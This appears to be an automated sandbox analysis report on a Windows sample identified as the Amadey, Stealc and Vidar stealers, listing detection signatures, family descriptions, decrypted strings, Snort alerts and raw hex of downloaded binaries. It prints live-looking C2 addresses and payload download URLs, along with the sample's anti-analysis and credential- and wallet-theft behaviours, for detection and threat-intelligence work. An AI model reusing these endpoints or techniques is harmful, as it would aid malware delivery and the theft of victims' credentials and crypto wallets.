Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1467934
MD5: 5df47a238d51fdad9b442feb6c833886
SHA1: 9332ec9a71256cfdea81cfbf8627f0a274802b1d
SHA256: d06e1fd08af8234eb7d356343329905327126518eea8bee8e00f10aeaf7d3a09
Tags: exe
Infos:

Detection

Amadey, Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://85.28.47.30/69934896f997d5bb/softokn3.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exe Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/cost/go.exe Avira URL Cloud: Label: malware
Source: http://85.28.47.30/69934896f997d5bb/freebl3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.30/69934896f997d5bb/softokn3.dll= Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php Avira URL Cloud: Label: phishing
Source: http://85.28.47.30/69934896f997d5bb/nss3.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php/ Avira URL Cloud: Label: phishing
Source: http://85.28.47.30/69934896f997d5bb/nss3.dlldf Avira URL Cloud: Label: malware
Source: http://85.28.47.30/69934896f997d5bb/sqlite3.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php Avira URL Cloud: Label: phishing
Source: http://85.28.47.30/920475a59bac849d.phpI Avira URL Cloud: Label: malware
Source: http://85.28.47.30/69934896f997d5bb/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.30/69934896f997d5bb/mozglue.dllhg Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exe-Disposition: Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exeQ Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exe00 Avira URL Cloud: Label: phishing
Source: 85.28.47.30/920475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://85.28.47.30/920475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://85.28.47.30/69934896f997d5bb/msvcp140.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exeData Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/cost/go.exe00 Avira URL Cloud: Label: phishing
Source: http://77.91.77.82/Hun4Ko/index.php# Avira URL Cloud: Label: phishing
Source: http://85.28.47.30/69934896f997d5bb/mozglue.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.30 Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amadka[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 0.2.file.exe.4b0000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.30/920475a59bac849d.php"}
Source: explorti.exe.7548.12.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php", "http://77.91.77.82/Hun4Ko/index.php"]}
Source: file.exe.6436.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "85.28.47.30/920475a59bac849d.php"}
Multi AV Scanner detection for domain / URL
Source: http://77.91.77.81/mine/amadka.exe Virustotal: Detection: 26% Perma Link
Source: http://77.91.77.81/cost/go.exe Virustotal: Detection: 27% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.phpG Virustotal: Detection: 21% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.phpZ Virustotal: Detection: 22% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php/ Virustotal: Detection: 22% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php Virustotal: Detection: 22% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php Virustotal: Detection: 24% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php- Virustotal: Detection: 21% Perma Link
Source: http://77.91.77.81/mine/amadka.exe-Disposition: Virustotal: Detection: 25% Perma Link
Source: http://77.91.77.81/mine/amadka.exeQ Virustotal: Detection: 18% Perma Link
Source: http://77.91.77.81/mine/amadka.exe00 Virustotal: Detection: 25% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php9 Virustotal: Detection: 20% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amadka[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe ReversingLabs: Detection: 42%
Multi AV Scanner detection for submitted file
Source: file.exe Virustotal: Detection: 47% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amadka[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetProcAddress
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: LoadLibraryA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: lstrcatA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: OpenEventA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: CreateEventA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: CloseHandle
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: Sleep
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: VirtualFree
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetSystemInfo
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: VirtualAlloc
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: HeapAlloc
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetComputerNameA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: lstrcpyA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetProcessHeap
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetCurrentProcess
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: lstrlenA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: ExitProcess
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetSystemTime
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: advapi32.dll
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: gdi32.dll
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: user32.dll
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: crypt32.dll
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: ntdll.dll
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetUserNameA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: CreateDCA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetDeviceCaps
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: ReleaseDC
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: sscanf
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: VMwareVMware
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: HAL9TH
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: JohnDoe
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: DISPLAY
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: http://85.28.47.30
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: /920475a59bac849d.php
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: /69934896f997d5bb/
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: Nice
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetFileAttributesA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GlobalLock
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: HeapFree
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetFileSize
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GlobalSize
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: IsWow64Process
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: Process32Next
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetLocalTime
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: FreeLibrary
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: Process32First
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: DeleteFileA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: FindNextFileA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: LocalFree
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: FindClose
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: LocalAlloc
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetFileSizeEx
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: ReadFile
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: SetFilePointer
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: WriteFile
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: CreateFileA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: FindFirstFileA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: CopyFileA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: VirtualProtect
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetLastError
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: lstrcpynA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GlobalFree
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GlobalAlloc
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: OpenProcess
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: TerminateProcess
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: gdiplus.dll
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: ole32.dll
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: bcrypt.dll
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: wininet.dll
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: shlwapi.dll
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: shell32.dll
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: psapi.dll
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: SelectObject
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: BitBlt
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: DeleteObject
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C606C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C606C80
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.4:49730 -> 85.28.47.30:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.4:49730 -> 85.28.47.30:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 85.28.47.30:80 -> 192.168.2.4:49730
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.4:49730 -> 85.28.47.30:80
Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 85.28.47.30:80 -> 192.168.2.4:49730
Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49744 -> 77.91.77.82:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 85.28.47.30/920475a59bac849d.php
Source: Malware configuration extractor URLs: http://85.28.47.30/920475a59bac849d.php
Source: Malware configuration extractor IPs: 77.91.77.82
Source: Malware configuration extractor IPs: 77.91.77.82
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 02:35:59 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 02:36:04 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 